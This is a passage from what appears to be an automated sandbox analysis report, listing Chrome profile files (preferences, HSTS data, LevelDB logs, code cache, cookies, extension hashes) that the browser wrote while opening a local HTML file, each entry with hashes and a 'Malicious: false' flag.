iration":"13267947127171487","port":443,"protocol_str":"quic"},{"advertised_versions":[50],"expiration":"13267947127171491","port":443,"protocol_str

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\36ea0779-8047-4421-86c0-3e9fd52f6a28.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	6063
Entropy (8bit):	5.17914836578524
Encrypted:	false
SSDEEP:	96:nlCTcG32HyevLnxcV3ok0JCSuRkwRyRWL8VbOTQVuwn:nlCF2Fcc4tLwY6
MD5:	437D985EE5A64CB14293EDC78AD2AAFD
SHA1:	63ECAB5309457268B5D6A0D4F42733140C159917
SHA-256:	CD81AA22F61B1A373F6AEE47F5C2CF43B5656410E390F4AC06B894757EE407B9
SHA-512:	CCE51E53328FF54D28E03B724B65C0CAA46E9DD2813C132704B8EC2336E12CF141486EEAAB81E54A61E8AA7933860D51812F504F9B1D1DDA5A23141080F19253
Malicious:	false
Preview:	{"account_id_migration_state":2,"account_tracker_service_last_update":"13265355122524508","alternate_error_pages":{"backup":true},"announcement_notification_service_first_run_time":"13245951485614034","autocomplete":{"retention_policy_last_version":85},"autofill":{"orphan_rows_removed":true},"browser":{"default_browser_infobar_last_declined":"13245951692116406","has_seen_welcome_page":true,"navi_onboard_group":"","should_reset_check_default_browser":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"countryid_at_install":21843,"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","0","7355378"],"daily_received_length":["0","0","0","0","0","0","0","

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\4101622d-eadb-424c-a187-cc154041c0bb.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	1039
Entropy (8bit):	5.570405372327632
Encrypted:	false
SSDEEP:	24:YI6H0UhVsTG1KUerkq/HeUeXby2qUeXvq7wUjPRUenHQ:YI6UUhVseKUewqPeUer2Uef0wUj5Uenw
MD5:	07740D3E5BECED57D732A51426358610
SHA1:	858D5714F8751F6010D0BF2344AAE30CEA2DCAB2
SHA-256:	E907DBFBA429DBE0C39E79A1393E0EB16958AA4C3B6CA7F9E56733462C04E732
SHA-512:	C264F87A5D87F98C77F40F9ED36276FC8A78CD3E3F7C3C87BBCB20C159C732C7DD1F9C05BB19D3F382D194575C6E41AFF02D770D86C7F67FABB2D58D1BF14DD5
Malicious:	false
Preview:	{"expect_ct":[],"sts":[{"expiry":1633014077.350499,"host":"OuKlWsMW1dkkbI1X/oi6o0Y95ZNSWnSoeaIXAEYPlv4=","mode":"force-https","sts_include_subdomains":true,"sts_observed":1601478077.350503},{"expiry":1633014077.22511,"host":"nAuqgR4iEWti7SOdT3UHPl6rmZU/DeaIm38P2O2OkgA=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1601478077.225114},{"expiry":1633014092.4175,"host":"0J7rAWV0ouCFYJ9XrkDiKnAO1SshXJmLJE1SS3V8kDM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1601478092.417504},{"expiry":1633014091.91938,"host":"5EdUoB7YUY9zZV+2DkgVXgho8WUvp+D+6KpeUOhNQIM=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1601478091.919383},{"expiry":1652417526.842544,"host":"8/RrMmQlCD2Gsp14wUCE1P8r7B2C5+yE0+g79IPyRsc=","mode":"force-https","sts_include_subdomains":false,"sts_observed":1620881526.842548},{"expiry":1633014077.462534,"host":"+ccWXqaoHJ9hfuXbleKV6FQUrBlyXAJ31BdqjNQJpHs=","mode":"force-https","sts_include_subdomains":false,"sts_obs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\784388af-9f29-4268-a958-4147d170c664.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	22595
Entropy (8bit):	5.535208615598729
Encrypted:	false
SSDEEP:	384:smSt5LlUrX51kXqKf/pUZNCgVLH2HfD7rUYXHGiknTlEoB8K4LQ:gLl251kXqKf/pUZNCgVLH2HfnrUY3GiQ
MD5:	3343A17CD50616EAAFBC01C8E0EA5F64
SHA1:	C91FB0AF63D4DE02B1A0ED596DF63147184B5D1D
SHA-256:	3005EAFCC98A601B6A29302D7198F49601E1A8B82526DF221F57DF28BC287C92
SHA-512:	5CEDA08F57EA78447597DE3432ADCE2DD1EFD35AD304F108881C4983F8A8764595CF8CAB2F664D3BDAAD3553CFBA6AEA6C2C1AED3CCDDFE3D36E9D36E240C19B
Malicious:	false
Preview:	{"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"manifest_permissions":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"from_bookmark":false,"from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"install_time":"13265355122297996","location":5,"manifest":{"app":{"launch":{"web_url":"https://chrome.google.com/webstore"},"urls":["https://chrome.google.com/webstore"]},"description":"Discover great apps, games, extensions and themes for Google Chrome.","icons":{"128":"webstore_icon_128.png","16":"webstore_icon_16.png"},"key":"MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCtl3tO0osjuzRsf6xtD2SKxPlTfuoy7AWoObysitBPvH5fE1NaAA1/2JkPWkVDhdLBWLaIBPYeXbzlHp3y4Vv/4XG+aN5qFE3z+1RU/NqkzVYHtIpVScf3DjTYtKVL66mzVGijSoAIwbFCC3LpGdaoe6Q1rSRDp76wR6jjFzsYwQIDAQAB","name":"Web Store","pe

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\7a860c75-6872-43b8-94de-e9bbc76d61a5.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	4219
Entropy (8bit):	4.871684703914691
Encrypted:	false
SSDEEP:	48:YXsJjMH+5s7YMHBKsvxMHVzspxMHbsIHt/soBDysKqnsllzMHpDCLsWJMHLsNuMg:RG+ZGJG+GTTD7IGpD+G7Gp2GnG4GVhH
MD5:	EDC4A4E22003A711AEF67FAED28DB603
SHA1:	977E551B9ED5F60D018C030B0B4AA2E33B954556
SHA-256:	DD2C9F43F622F801FCC213CDE8E3E90EF1D0D26665AE675449A94CEC7EB1D453
SHA-512:	84D3930579FD73C7D86144D5CDC636436955BA79759273C740D2D72BC4847F2F7F165BBCA3EB2E4DFB01777D6A5F141623278C1BF74615C5A491092CE3FD1602
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"alternative_service":[{"advertised_versions":[],"expiration":"13248543677350473","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543677350474","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31344},"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501474403","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":31656},"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[],"expiration":"13248543501454993","port":443,"protocol_str":"quic"},{"advertised_versions":[],"expiration":"13248543501454994","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":39369},"server":"https://www.googleapis.com","supports_spdy":true},

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\8ee250fc-7e00-4ade-a5e0-b2a701ed64b7.tmp Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	modified
Size (bytes):	3106
Entropy (8bit):	4.900822983252745
Encrypted:	false
SSDEEP:	96:JOXGDHzLuA4G54HVNCy/7sGQ+GcG3GzhH:JOXGDHzLuA4GcVNCk7sn+X0M
MD5:	954787EE907D470265EACC1CF26F7FF2
SHA1:	887A7A7103F94EDAAA212AB0D49283898198B54F
SHA-256:	86F1664989401EAE1544F84CC97517FB6A275EDE50DF2552705220DFD324B541
SHA-512:	68CC8E091BD35C00960EF85FCFCD5004EC4514A1FBEDD44A301AB9C5630D72F19BF5BE22B5C28DFB0A18E85E326C2706028E95116BF89A21861A9E2BEC0D3ED1
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://ssl.gstatic.com","supports_spdy":true},{"isolation":[],"server":"https://apis.google.com","supports_spdy":true},{"isolation":[],"server":"https://play.google.com","supports_spdy":true},{"isolation":[],"server":"https://ogs.google.com","supports_spdy":true},{"isolation":[],"server":"https://dns.google","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13267947126842403","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://accounts.google.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13267947126868170","port":443,"protocol_str":"quic"}],"isolation":[],"server":"https://redirector.gvt1.com","supports_spdy":true},{"alternative_service":[{"advertised_versions":[50],"expiration":"13267947127171487","port":443,"protocol_str":"quic"},{"advertised_versions":[50],"expiration":"13267947127171491","port":443,"protocol_str

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	334
Entropy (8bit):	5.185575195093163
Encrypted:	false
SSDEEP:	6:mXDjSfq2PWXp+N23iKKdK9RXXTZIFUtp8DnuUhZmwP8DlSekwOWXp+N23iKKdK9l:s+va5Kk7XT2FUtp8SY/P8JSe5f5Kk7XH
MD5:	7DFB98C22D01755A4928C04B49911EFF
SHA1:	0D7DAFF61B185CF4B9101EAABE4A943A95E58CD9
SHA-256:	1778120744ACF1C5F34CE9E589E24F5522DBD5A6005B9A0FA79561FBC8BFA381
SHA-512:	6A738EC70B8051FC58E0B578BFFCC9110C8A4762001640DDE3578BC1516C4C1A31337735BE0B7727EBEC1250F50BF1E143D617F09B1510E90A8011792019FA17
Malicious:	false
Preview:	2021/05/12-21:52:10.240 1830 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/MANIFEST-000001.2021/05/12-21:52:10.244 1830 Recovering log #3.2021/05/12-21:52:10.246 1830 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	318
Entropy (8bit):	5.162266423103988
Encrypted:	false
SSDEEP:	6:mXDOXFoq2PWXp+N23iKKdKyDZIFUtp8DF5ZmwP8DgkwOWXp+N23iKKdKyJLJ:sqXWva5Kk02FUtp8x5/P8U5f5KkWJ
MD5:	D0A3A83BEB1E878643698059A8F331A3
SHA1:	CACBF01330A4BA24E578518936464FF168BD8B66
SHA-256:	61E3C2AB6A494C743C7E474A518A3E4ECE3E2A4C9EC60E70012DEC3FE34A1527
SHA-512:	B9A00F688E199231503DA26662C4FF8C6C0D6761643CF03624FB187B054408001DBE5740944D59F674CE0F0050D3C194CC6319C183ECEE658FDA1B3773E7D628
Malicious:	false
Preview:	2021/05/12-21:52:10.122 1830 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/MANIFEST-000001.2021/05/12-21:52:10.176 1830 Recovering log #3.2021/05/12-21:52:10.177 1830 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\602f5f874f3385c7_0 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	241
Entropy (8bit):	5.615655857519206
Encrypted:	false
SSDEEP:	6:mBy6EYGLKdXNQKH8KtRukuTXltTg8+44AJhK6t:2bhNQKH8Kt8b1g8+Q7
MD5:	519116AB31542F8B8DFFD84952C4B398
SHA1:	CDB8884E6584C7D3B8260F399244FEFB6AE75C1C
SHA-256:	B380AF8C73CCC0BC8B67538A55430C6991068E91663FB8CE2B94B73C28ADFEDF
SHA-512:	FFFDF90A3DC2E9AC968700CBFD1BE65A0D3B5B86F2F2F79CA04236F2AF62A17BF9D459C6C5E999D389E874EF858AE839B2FEC0B592CEB2256B73F13929DF66B9
Malicious:	false
Preview:	0\r..m......m.....[....._keyhttps://www.gstatic.com/recaptcha/releases/npGaewopg1UaB8CNtYfx-y1j/recaptcha__en.js .https://google.com/..,. /.............2.......y..G.(.(.l.Z........6...t=..;.A..Eo.......W...........A..Eo..................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\91be9c6b8d3150fe_0 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	252
Entropy (8bit):	5.564703650348043
Encrypted:	false
SSDEEP:	6:mktVYGLKdXNQKH8KtcmEO9uT0ECw8a9oOgK44K6t:chNQKH8KtKCEZ1982
MD5:	97425409A00A0969ED605C61F3999069
SHA1:	2528D8F823E0389BEA3826AF925896AC20C37711
SHA-256:	4BB76C5A23C294E53A4A3AAD7A8324CF0CD47A0771893C497D20494742355B5C
SHA-512:	3ACAB68B56F9C5A36F2C7B0D315ED20F5702F8BB75D5DD132BD45F92A2B0B15B9CE482DA6202A70A5C9D4D85B5D4DDAA90F1DCB3AA629AAAAD4E928AF6E84B54
Malicious:	false
Preview:	0\r..m......x....h......_keyhttps://www.gstatic.com/recaptcha/releases/npGaewopg1UaB8CNtYfx-y1j/recaptcha__en.js .https://kristenbakercoach.com/..,. /.............U........1....!i..{......}....7z.NW`.A..Eo........4..........A..Eo..................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\e222f00a6abb9a7f_0 Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	194
Entropy (8bit):	5.4175498268223645
Encrypted:	false
SSDEEP:	3:m+lK38RzYP2FycyGoUwRmMPZgrRv1lHCepFyLwhTo/GwQiMCB6P5mdkJxpK5kt:mgYe4HwMPZggvLQintMC+4deK6t
MD5:	3F07C681274B19612EE5B27E9BDF3D78
SHA1:	8BE45386B9422B19977994583DED47DA60D323F3
SHA-256:	6F0134CC4912472A68BB40E80EAAFD8944F55E36B4706EE47E7842C7D56E1652
SHA-512:	DA6C24D8945E257E069650E8C2CCFE3AF3D5440F168ACA9E40FECB6E31974370F7BC3E32AF45D5E737736AE3C692ACA8892505284BA4B564A1957E02CECDD723
Malicious:	false
Preview:	0\r..m......>.....$....._keyhttps://code.jquery.com/jquery-3.5.1.js .http://rwbdg.com/u.9,. /.............;.........W.~...9......c.....)...._D..A..Eo........A,.........A..Eo..................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	312
Entropy (8bit):	4.824895056742405
Encrypted:	false
SSDEEP:	6:/20XZY6uF90hlkeGizQ3zbn3pHkQ+IRwHFD:e0pY6vhlkeGizyz7V4hFD
MD5:	18FDBDEE47613BA1E1006F3926277CA7
SHA1:	2D2809F24292E9C56F3F732EE17D2C623857D0CD
SHA-256:	DBA3919F2FB2A0F066E8F0A437995B1D89A206ABF2BEE468ECEC8C905D5F37A2
SHA-512:	0F6EE174B466B3E252C5B3104CDE203D43E61060609256CD4F6560001AB79915E9258C3C2767D220D99064F1139FB6DE4319B063684C87122D912B17EBA17E6B
Malicious:	false
Preview:	0...1vz.oy retne.........................3O._/`@..,. /..........P1.k....`.,. /............j.."..N9,. /..........^}.Np..@ikt../..........-..0..x@ikt../............/...3.KPu../.................KPu../.........&<..\.O$.KPu../.........p..(....KPu../..........q....._.KPu../.........+<P\|...X.KPu../.........YO.,. /.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	1.2189868255349838
Encrypted:	false
SSDEEP:	24:TLyqJLbXaFpEO5bNmISHn06UwcmyFMcsaPENB7NHEBy7FyT:TekLLOpEO5J/Kn7U1NMOMNNKBGi
MD5:	E585A841A20047804CEBD8FC50A9DEFB
SHA1:	70B5BEB1E145CECA53C43FA08F82EB9D0F4868F0
SHA-256:	4FCF8FC1442D674F48467655ABBFFAE455687FC6A9A99EE5D745D77F86684A40
SHA-512:	BE2B7EFEEE43854DEFDBB58AAEA9FA40F5122EB236D7B8FC7A6E73ABF40395915181975BF0B3B1C69D10F93015D2E9A42357B64A8775E592B23EBB2E235F37C8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies-journal Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	12836
Entropy (8bit):	0.9691286998708171
Encrypted:	false
SSDEEP:	24:McLgAZOZD/nqLbJLbXaFpEO5bNmISHn06Uw48:M8NOZnq5LLOpEO5J/Kn7Uv8
MD5:	2B8C3C94E2F3DB7CCDFC9466E5B6E5AC
SHA1:	B8D8A7996C6DA8B25D8F1B75DC0E2257611D669A
SHA-256:	73BA10042A06F978E03CC8982C4455A2E4742F0FF6ECE13F6154DFE2BA9BC3C3
SHA-512:	1BF3CFAD00274DC3477CC8FB5F19802974860FF2B3A2C11BCC1BEA9A4A8394CFE2FFBFB87B356C5A30524DACD4E5314B50D7846DD9A0C0493AD5A5649DF1928C
Malicious:	false
Preview:	......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Session Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	18331
Entropy (8bit):	3.803147658954213
Encrypted:	false
SSDEEP:	192:3rNXQtr8Bjc5Wtr8gtr8gy/bzZ96F5Wtr8Ktr8gy/bzZGz5Wtr87Str8kp57Oa5s:7NXwoBPogob/bmeoeob/bHoSokzOaO
MD5:	67A1218CBDAD5FEC7101EA9521F7E660
SHA1:	3F1987159F52D5F08C3D2BC44443A4A65BF312E4
SHA-256:	1BAE128D583E75F94AF6FF84B881877DF2536059DFC9411BE1C72B4955AE1FA4
SHA-512:	C0DA8E7EF387A3A9EB23B57B7EAD5F6C11A83A9B1196F6C2B93E2D5D98E48F860DD39ACFE10A18B04BC41DE54E3C1E99694D2C7AB525E9F9BBC66BC2134BDDDF
Malicious:	false
Preview:	SNSS....................................................!.............................................1..,.......$...42cebae4_3b6a_4fc5_8aa0_8493010d4a46......................,..................................................................................5..0.......&...{524A03AB-861D-4591-9B4E-BDD69F9D425A}.............a..\...........+...file:///C:/Users/user/Desktop/5781525.html.....................................................h.......`.........................................................k.......k.............................................^...+...f.i.l.e.:./././.C.:./.U.s.e.r.s./.h.a.r.d.z./.D.e.s.k.t.o.p./.5.7.8.1.5.2.5...h.t.m.l...................................8.......0.......8....................................................................... .......................................................+...file:///C:/Users/user/Desktop/5781525.html......@.+. /..................................................................................................J...http://

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Current Tabs Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	8
Entropy (8bit):	1.8112781244591325
Encrypted:	false
SSDEEP:	3:3Dtn:3h
MD5:	0686D6159557E1162D04C44240103333
SHA1:	053E9DB58E20A67D1E158E407094359BF61D0639
SHA-256:	3303D5EED881951B0BB52CF1C6BFA758770034D0120C197F9F7A3520B92A86FB
SHA-512:	884C0D3594390E2FC0AEAB05460F0783815170C4B57DB749B8AD9CD10741A5604B7A0F979465C4171AD9C14ED56359A4508B4DE58E794550599AAA261120976C
Malicious:	false
Preview:	SNSS....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	183
Entropy (8bit):	4.267376444120917
Encrypted:	false
SSDEEP:	3:FQxlXayz/t2Hmwg0EOZL7Ao4uhFkEuRLKyC5Ei5+GgGg:qT5z/t2qoEwhXeLKBt
MD5:	7FA0F874EABF1EED31988230680AD210
SHA1:	E71B360F1E8D5C278A051AD03DFB9027ACCF38C3
SHA-256:	09E15F8939364145E710C314EBD93FD19BF60C2B6B20BF8023315D617B6B141B
SHA-512:	AF4C2E595AA0B1FD96474A0E73530B38BE5F2906B10BE1DEFC0A9221129A3E5BB8D0816777550863AD426C5C836ECA1F0C384986C2A1108E2E4CA20EF10A7824
Malicious:	false
Preview:	.f.5................i.Wd...............Sgdaefkejpgkiemlaofpalmlakkmbjdnl.declarative_rules.declarativeContent.onPageChanged.[]..F..................F..................F................

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.1562670936041926
Encrypted:	false
SSDEEP:	6:mXZEjMM+q2PWXp+N23iKKdK8aPrqIFUtp8Z/vZmwP8ZSFTMVkwOWXp+N23iKKdKc:sZMN+va5KkL3FUtp8Z/v/P8ZFV5f5Kkc
MD5:	70B8341212850443EC06C045C658EC81
SHA1:	B9BA8B0758DE47F727F396C374D42442A166A9A6
SHA-256:	146C486B06CEA1AEBD8536A5167530FE1E6C3C2756C82817475A04DF693E1206
SHA-512:	050BA296F47E113E7B8DA5CAFFAA548F7B73C5AD5F32F2FEF735D3535DBFD47915113E3D1EF95DA2A07DD59AC90E9CFA9A7EDE3D993133F694458E10EC80EC5A
Malicious:	false
Preview:	2021/05/12-21:52:02.528 18ac Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/MANIFEST-000001.2021/05/12-21:52:02.529 18ac Recovering log #3.2021/05/12-21:52:02.530 18ac Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\000003.log Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	data
Category:	dropped
Size (bytes):	627
Entropy (8bit):	1.8784775129881184
Encrypted:	false
SSDEEP:	12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWW:
MD5:	9D7435EA49A80FDD66E4915F513017F9
SHA1:	469F6C6E4B19B85CC1BE497812B2F20864F4FF2C
SHA-256:	409D4C47E940688527D730B996E8991E010988C7671565467ED69D640D0947F3
SHA-512:	0561CD632D4219AEF4686DE40EC092921384CA89755D354801E0EAEC8645A8630A180807AF518AC8FCF01F71EB3D10FAA9CE1E62C7A7226A274975BDCB7EEB4C
Malicious:	false
Preview:	.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State\LOG Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	320
Entropy (8bit):	5.2292868936404755
Encrypted:	false
SSDEEP:	6:mXcqVq2PWXp+N23iKKdK8NIFUtp88gZmwP8OPSIkwOWXp+N23iKKdK8+eLJ:scWva5KkpFUtp8l/P8i5f5KkqJ
MD5:	9FECAA2F02462E501F7EA34B3044D2D6
SHA1:	C65CABA98968C0EA37BD187AF027432E6B663B23
SHA-256:	8073940DFEAFDAA5F2D87EC2D998768A5EA51D97530C9D7703824696C44E0DFF
SHA-512:	4AA3DED2CDA4019D935651692C4DE913F5D7790805DDCE6140AE8566B16E899D71F616D37784713FDBAE978860DC0F61F18E5B30B12DC4C4E0DB384D5938018C
Malicious:	false
Preview:	2021/05/12-21:52:04.437 1854 Reusing MANIFEST C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/MANIFEST-000001.2021/05/12-21:52:04.438 1854 Recovering log #3.2021/05/12-21:52:04.439 1854 Reusing old log C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State/000003.log .

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_metadata\computed_hashes.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	11217
Entropy (8bit):	6.069602775336632
Encrypted:	false
SSDEEP:	192:GbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Gb+nldByaFx4toj8VEPT
MD5:	90F880064A42B29CCFF51FE5425BF1A3
SHA1:	6A3CAE3996E9FFF653A1DDF731CED32B2BE2ACBF
SHA-256:	965203D541E442C107DBC6D5B395168123D0397559774BEAE4E5B9ABC44EF268
SHA-512:	D9CBFCD865356F19A57954F8FD952CAF3D31B354112766C41892D1EF40BD2533682D4EC3F4DA0E59A5397364F67A484B45091BA94E6C69ED18AB681403DFD3F3
Malicious:	false
Preview:	{"file_hashes":[{"block_hashes":["A+1PYW3V6CJbBuQ7aqrgYhyH3bT8PKyBXp3hN2slpI0=","WSOpQRkYTHjPSlG9Zif2a7TNhy43NDcG1Zg5Nv0UbH0=","jDctR8ImG5KZrQKm4kDjUB7FokSJfjo/pmvFowRVlaY=","LPxhhJiuU0lprt0T6flpS7TkaDg7MocrbmzO65xH6RI=","nZ9zLb2By96AkKXALRM+C0Eu11XUjPiMXEKjiCPdtHE=","wifibc1QfMBN2jrtUtLgsCefvuceTpAatmLvul11RJA=","dHjWlSIIdjj7MWqg3T8MG58RuuqRXk32vqi/13JqEgA=","zd3DV7dbvfNvx1hdhU01fW5ily52DLN0CFL/ADaEeTI=","DpjXcO85FFFY9KJFPkGNfFUtdQIOsGwO5jUckiUwY14=","gqid6l1+mk/6yWgUECRofI9lMipXgXh2jEN2+CxmPE0=","prDB91X2Mmfg/M/txVMITWBmEGbOGjqBTP7CMjYqdHs=","yLPAqV4gqoyS/zFkEt3Cn2j0q2v9QOSthVFfWn8EzCM=","EPQ3jzdrLkAHyvf3920B5Y3aAkO1IJdn/UtbnAmq6T0=","+oOc6ca+ChKUpTu+oa2ZRxRE+wG3QJmuYWEvYCs40NI=","3mBGNAiRlTANEQkqzU3TEi+5wJ0ubR5uwtS4/9OOM7w=","1A9NNawxuhu95H5eThvf1rewJ4QQWhhPNxJXO1C/n68=","E3vWLQxzmj+e5QxYbUscllJ5n0ITpw5JBHV1Kph3/KM=","i3I8ghdTF9c1ZXNBZmvsID+DV4gxBVN27rj9wsMtRpg=","R8B8qYabnMSlLPhrtu0hGYrHn3llsMHqBbi70gkIjEE=","rhlzuEvv2KRAFMms896xFwkNgPrw6WvmgPn6xrBSa2Y=","LAMXv6sRb0VZrY34aVXF3Fftxs

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_1\_metadata\computed_hashes.json Download File
Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	11217
Entropy (8bit):	6.069602775336632
Encrypted:	false
SSDEEP:	192:GbylJnlTwGB7V9Hne4qasKxXItmLG48gcLg/PkI:Gb+nldByaFx4toj8VEPT
MD5:	90F880064A42B29CCFF51FE5425BF1A3
SHA1:	6A3CAE3996E9FFF653A1DDF731CED32B2BE2ACBF
SHA-256:	965203D541E442C107DBC6D5B395168123D0397559774BEAE4E5B9ABC44EF268
SHA-512:	D9CBFCD865356F19A57954F8FD952CAF3D31B354112766C41892D1EF40BD2533682D4EC3F4DA0E59A5397364F67A484B45091BA94E6C69ED18AB681403DFD3F3
Malicious:	false
